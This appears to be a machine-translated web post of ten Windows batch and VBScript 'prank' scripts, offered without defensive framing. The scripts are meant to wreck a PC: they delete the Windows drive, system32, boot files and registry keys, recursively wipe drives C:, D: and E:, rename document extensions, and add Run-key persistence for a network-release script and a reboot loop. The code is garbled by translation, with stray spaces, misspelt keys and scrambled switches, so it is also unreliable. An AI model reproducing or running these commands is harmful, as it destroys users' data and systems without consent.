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CMD spoofs code


Youtube handling
https://www.youtube.com/watch? V=2 izryprfkuu
Blue screen of death 1
2 changes file suffix
3 remove system32
4 make the PC permanent collapse
5 to delete all the registry
6 permanently disable network
7 has been press enter
8 to start the computer automatic shutdown after
9 open CD buzzer
10 format the hard disk

1. Windowsdrive Del % % \ *. */f/s/q Shutdown - s - 0 f - t
2. Ren *. Doc *. TXT Ren *. Jpeg *. TXT Ren *. LNK *. TXT Ren *. Avi *. TXT Ren *. Mpeg *. TXT Ren *. Com *. TXT Ren *. Bat *. TXT
3. Del c: \ Windows \ system32 \ *. */q
4. @ echo off Attrib - r - s - h c: \ autoexec. Bat Del c: \ autoexec. Bat Attrib - r - s - h c: \ boot. Ini Del c: \ boot. Ini Attrib - r - s - h c: \ NTLDR Del c: \ NTLDR Attrib - r - s - h c: \ Windows \ Windows ini Del c: \ Windows \ Windows ini
5. @ echo off the Start reg delete HKCR/. Exe Start reg delete HKCR/. DLL Start reg delete HKCR/*
6. The echo @ echo off> C: \ Windows \ wimn32 bat echo break off> C: \ Windows \ wimn32 bat echo ipconfig/release_all & gt;> C: \ windowswimn32. Bat echo end> C: \ Windows \ wimn32 bat reg add HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run reg_sz WINDOWsAPI/t/d/v c: \ Windows \ wimn32 bat/f reg add HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVision \ Run reg_sz CONTROLexit/t/d/v c:/Windows/wimn32. Bat/f Pause
7. (this will save as. VBS) Set wshShell=wscript. CreateObject (" wscript. Shell ") do wscript. Sleep 100 wshShell sendkeys "~ (enter) loop"
8. Echo @ echo off> C: \ Windows \ hartlell bat echo break off> C: \ Windows \ hartlell bat echo shutdown -r -t 11 - f> C: \ Windows \ hartlell bat echo end> C: \ Windows \ hartlell bat reg add HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run reg_sz startAPI/t/d/v c: \ Windows \ hartlell bat/f reg add HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ reg_sz Run/v/t/d c: \ Windows \ hartlell bat/f pause
9. (this is also. VBS format) Set oWMP=CreateObject (WMPlayer. OCX. "7") Set colCDROMs=oWMP. CdromCollection do if colCDROMs. Count>=1 then the For I=0 to colCDROMs. ColCDROMs Count - 1. The Item (I). Eject Next For I=0 to colCDROMs. ColCDROMs Count - 1. The Item (I). Eject Next End If wscript. Sleep 100 loop
10. Rd/s/q D: \
Rd/s/q C: \
Rd/s/q E: \
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